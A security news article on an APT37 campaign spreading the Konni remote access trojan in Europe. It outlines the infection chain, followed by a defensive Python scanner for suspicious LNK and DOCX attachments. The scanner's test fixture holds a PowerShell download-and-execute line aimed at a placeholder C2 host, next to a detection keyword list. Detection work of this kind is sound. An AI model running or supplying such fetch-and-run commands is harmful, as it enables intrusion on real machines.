Konni RAT malware used by APT37 to target Europe

July 26, 2022
Konni RAT, Malware, APT37, North Korean Hackers, Europe, Remote Access Trojan, Phishing

Cybersecurity analysts revealed a new threat campaign attributed to the North Korean-sponsored advanced persistent threat (APT) group known as APT37. Based on reports, the sophisticated threat group targets high-value organisations in several European countries, such as Poland and the Czech Republic.

In this campaign, APT37 used the malware known as Konni, a remote access trojan that can establish persistence and escalate privileges on infected devices.

Konni malware has been attributed to numerous North Korean threat groups for years, and it was most recently seen in a spear-phishing campaign targeting the Russian Ministry of Foreign Affairs.

The attack is an ongoing campaign monitored by several cybersecurity groups. According to these researchers, it displays techniques and tradecraft consistent with the operational sophistication of an APT group.


The attack begins with a phishing email carrying an attachment that contains a Word document and a Windows shortcut (LNK) file.


When the user opens the LNK file, its embedded code runs and searches the DOCX file for a base64-encoded PowerShell script, which then establishes command-and-control communication. If the server responds with a command, two further files, named wp[.]vbs and weapon[.]doc, are retrieved.

The downloaded document serves as a decoy while the VBS file runs unnoticed in the background and creates a scheduled task on the host. By this stage, the adversary has already loaded the remote access trojan and established a channel for exchanging data.

The RAT can also capture screenshots, extract the state keys kept in the Local State file, steal saved credentials, and deploy a remote interactive shell that runs commands on the host.

In the final phase of the campaign, the attackers download additional files that support the modified Konni sample, retrieving them as compressed archives. These include several DLLs that replace legitimate Windows service libraries, such as wpcsvs in System32, which the adversaries use to run commands on the operating system with administrator-level privileges.
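A defender-side triage check for the lure described above, added here as an example and not code from the report or from the researchers it cites: it unpacks an attachment archive, flags a Windows shortcut shipped alongside a .docx, and searches the document's XML parts for a base64 blob that decodes to PowerShell. The archive layout, file names and embedded script are constructed test data, not indicators from the campaign.

```python
import base64
import io
import re
import zipfile

LNK_MAGIC = b"\x4c\x00\x00\x00\x01\x14\x02\x00\x00\x00\x00\x00\xc0\x00\x00\x00\x00\x00\x00\x46"  # HeaderSize 0x4C + LinkCLSID
PS_KEYWORDS = ("powershell", "invoke-expression", "iex ", "downloadstring", "frombase64string", "new-object")
B64_RUN = re.compile(rb"[A-Za-z0-9+/]{64,}={0,2}")  # base64 runs long enough to carry a script

def decode_powershell_blobs(data: bytes) -> list:
    """Return base64 runs in `data` that decode to text containing PowerShell keywords."""
    hits = []
    for m in B64_RUN.finditer(data):
        try:
            raw = base64.b64decode(m.group(0), validate=True)
        except ValueError:  # right alphabet but wrong length/padding: not base64
            continue
        for enc in ("utf-16-le", "ascii"):  # -EncodedCommand payloads are UTF-16LE
            text = raw.decode(enc, errors="replace")
            if any(k in text.lower() for k in PS_KEYWORDS):
                hits.append(text)
                break
    return hits

def scan_attachment(archive: bytes) -> dict:
    report = {"lnk": [], "docx": [], "powershell": []}
    with zipfile.ZipFile(io.BytesIO(archive)) as zf:
        for name in zf.namelist():
            body = zf.read(name)
            if name.lower().endswith(".lnk") and body.startswith(LNK_MAGIC):
                report["lnk"].append(name)
            elif name.lower().endswith(".docx") and zipfile.is_zipfile(io.BytesIO(body)):
                report["docx"].append(name)
                with zipfile.ZipFile(io.BytesIO(body)) as docx:  # a .docx is itself a zip of XML parts
                    for part in docx.namelist():
                        report["powershell"] += decode_powershell_blobs(docx.read(part))
    report["suspicious"] = bool(report["lnk"] and report["docx"])  # shortcut + document pair
    return report

def build_sample_attachment() -> bytes:
    # Constructed test input, not a real sample: a docx carrying a base64 UTF-16LE PowerShell string next to a bare shell-link header.
    script = "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://c2.invalid/s')"
    blob = base64.b64encode(script.encode("utf-16-le")).decode()
    docx, outer = io.BytesIO(), io.BytesIO()
    with zipfile.ZipFile(docx, "w") as d:
        d.writestr("word/document.xml", f"<w:document><w:t>{blob}</w:t></w:document>")
    with zipfile.ZipFile(outer, "w") as z:
        z.writestr("agenda.docx", docx.getvalue())
        z.writestr("agenda.lnk", LNK_MAGIC + b"\x00" * 56)
    return outer.getvalue()
```

Running `scan_attachment(build_sample_attachment())` returns a report with `suspicious` set and the decoded PowerShell string under `powershell`; on a mail gateway the same check would run over each attachment before delivery.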
